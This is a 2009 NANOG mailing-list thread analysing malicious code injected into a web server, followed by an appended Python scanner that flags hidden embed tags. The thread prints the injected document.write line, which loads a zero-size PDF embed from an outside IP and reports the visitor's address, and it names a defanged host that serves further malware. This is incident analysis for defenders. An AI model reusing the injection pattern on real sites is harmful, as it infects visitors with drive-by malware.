Malicious code just found on web server 13E-7EB

Jake Mailinglists jbabbinlists at gmail.com
Mon Apr 20 15:02:17 UTC 2009


On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists
<jbabbinlists at gmail.com>wrote:

> Paul,
> I noticed that in the PDF file but as the domain doesn't seem to have
> resolution I didn't mention it.
>
> Jake
>
> WHOIS information on the domain
>
> Whois Record
>
> domain:     TEST1.RU
> type:       CORPORATE
> nserver:    ns1.centerhost.ru.
> nserver:    ns1.cetis.ru.
> state:      REGISTERED, DELEGATED
> org:        Center of Effective Technologies and Systems CETIS
> phone:      +7 4957711654
> fax-no:     +7 4957879251
> e-mail:     <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
> e-mail:     <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
> registrar:  REGRU-REG-RIPN
> created:    2001.03.30
> paid-till:  2010.04.03
> source:     TC-RIPN
>
> Registry Data  Created: 2001-03-30  Expires: 2010-04-03  Whois Server:
> whois.ripn.net
>  Server Data Domain Status:  Registered And No Website
>
>
> On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgster at gmail.com>wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>>  On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com>
>> wrote:
>>
>>
>> >> I took a quick look at the code... formatted it in a pastebin here:
>> >> http://pastebin.com/m7b50be54
>> >>
>> >> That javascript writes this to the page (URL obscured):
>> >> document.write("<embed
>> >> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> >> type=\"application/pdf\"></embed>");
>> >>
>> >> The 1.2.3.4 in the URL is my public IP address (I changed that).
>> >>
>> >> Below the javascript, it grabs a PDF:
>> >> <embed src="include/two.pdf" width="1" height="0"
>> >> style="border:none"></embed>
>> >>
>> >> That PDF is on the site, I haven't looked at it yet though.
>> >>
>>
>> Not only is that .pdf malicious, when "executed" it also fetches
>> additional malware from:
>>
>> hxxp:// test1.ru /1.1.1/load.php
>>
>> If that host is not in your block list, it should be -- known purveyor of
>> crimeware.
>>
>> This is in addition to the other malicious URLs mentioned in this thread.
>>
>> - - ferg
>>
>> --
>> "Fergie", a.k.a. Paul Ferguson
>>  Engineering Architecture for the Internet
>>  fergdawgster(at)gmail.com
>>  ferg's tech blog: http://fergdawg.blogspot.com/
>>
>>
>
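As an added defender-side illustration (not code from the thread), here is a small Python scanner that flags hidden `<embed>` tags, including ones emitted through `document.write()` as in the injection Chris Mills described. The sample page and all function names are constructed for this example; the URLs in it are already defanged.

```python
"""Flag hidden <embed> tags, including those written by document.write()."""
import html
import re
from typing import Dict, List

# Constructed sample mirroring the thread: injected JS, the static PDF embed,
# and one ordinary visible embed that should not be flagged.
SAMPLE_PAGE = r'''
<html><body>
<script>
document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
</script>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
<embed src="player.swf" width="640" height="480"></embed>
</body></html>
'''

EMBED_RE = re.compile(r"<embed\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*"([^"]*)"')
# A double-quoted string literal handed to document.write(); \" is allowed inside.
DOCWRITE_RE = re.compile(r'document\.write\(\s*"((?:[^"\\]|\\.)*)"\s*\)', re.IGNORECASE)


def _attrs(raw: str) -> Dict[str, str]:
    return {k.lower(): v for k, v in ATTR_RE.findall(raw)}


def _is_hidden(a: Dict[str, str]) -> bool:
    """A 0x0 or 1x0 embed exists only to load content without being seen."""
    try:
        w, h = int(a.get("width", "100")), int(a.get("height", "100"))
    except ValueError:  # e.g. "100%": treat as visible
        return False
    return w <= 1 or h <= 1


def find_hidden_embeds(page: str) -> List[Dict[str, str]]:
    """Return hidden embeds with their origin: static markup or document.write()."""
    found = []
    # Scan static markup with the JS literals cut out, then each literal on its own.
    sources = [("static", DOCWRITE_RE.sub("", page))]
    sources += [("document.write", m.group(1).replace('\\"', '"'))
                for m in DOCWRITE_RE.finditer(page)]
    for origin, text in sources:
        for m in EMBED_RE.finditer(text):
            a = _attrs(m.group(1))
            if _is_hidden(a):
                found.append({"origin": origin, "src": html.unescape(a.get("src", "")),
                              "type": a.get("type", "")})
    return found


if __name__ == "__main__":
    for hit in find_hidden_embeds(SAMPLE_PAGE):
        print(hit)
```

Running it on the sample reports the 1x0 `include/two.pdf` embed and the 0x0 `application/pdf` embed built by `document.write()`, while the visible player embed is left alone.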



More information about the NANOG mailing list